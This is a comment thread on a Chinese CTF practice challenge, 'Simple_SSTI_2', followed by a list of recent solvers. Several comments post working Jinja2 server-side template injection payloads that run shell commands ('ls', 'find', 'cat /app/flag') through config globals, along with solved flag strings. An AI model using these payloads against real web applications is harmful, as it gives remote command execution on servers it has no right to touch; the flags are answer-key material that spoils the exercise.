Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 16545
提  示:
描  述:
Simple_SSTI_2
评论
Mirabelle 2年前

?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}}; ?flag={{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}

回复 5

ZeronKR1212 2年前

怎么做啊,哥哥们

回复 0

kimizu 2年前

SSTI模板注入,先尝试搜索有没有flag文件,发现有,cat以下就行 {{config.__class__.__init__.__globals__['os'].popen('find / -name flag').read()}} {{config.__class__.__init__.__globals__['os'].popen('cat /app/flag').read()}}

回复 3

3347665154 2年前

flag{a0a8ab35c083003f4bb44c7920b69bd1}

回复 0

jinyuxin 2年前

flag{3da091678f181776084413b87192ea57}

回复 0

kylin 2年前

flag{b433fd309dca8ad2f3f48656e6c0f548}

回复 0

Lucky. 2年前

flag{fccecffd6c3b833b580dce1d68f23037} 解决方案:/?flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}%20

回复 4

浪漫至死不渝 2年前

flag{fffa9cb43e10513975822893a1119edd}

回复 0

大哥大 2年前

http://114.67.175.224:10955/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}

回复 3

kid啦啦啦 2年前

SSTI注入

回复 1

WriteUp

image
valecalida

5 金币

评分(15)

解题动态

薄言. 攻破了该题 1天前
Zfc 攻破了该题 1天前
周文君 攻破了该题 2天前
杰哥 攻破了该题 3天前
zhaoguanjei 攻破了该题 4天前
tqlhg 攻破了该题 4天前
GrantFly 攻破了该题 6天前
yezhongyu 攻破了该题 6天前
heting 攻破了该题 6天前
y-123456 攻破了该题 7天前
271199@ 攻破了该题 8天前
dacming9527 攻破了该题 8天前
ggtom 攻破了该题 9天前
1586905095 攻破了该题 9天前
serena7780 攻破了该题 11天前
CTF-大王 攻破了该题 15天前
Ahri 攻破了该题 16天前
奥特曼 攻破了该题 16天前
SQZ 攻破了该题 17天前
wuyong5025 攻破了该题 19天前
问题反馈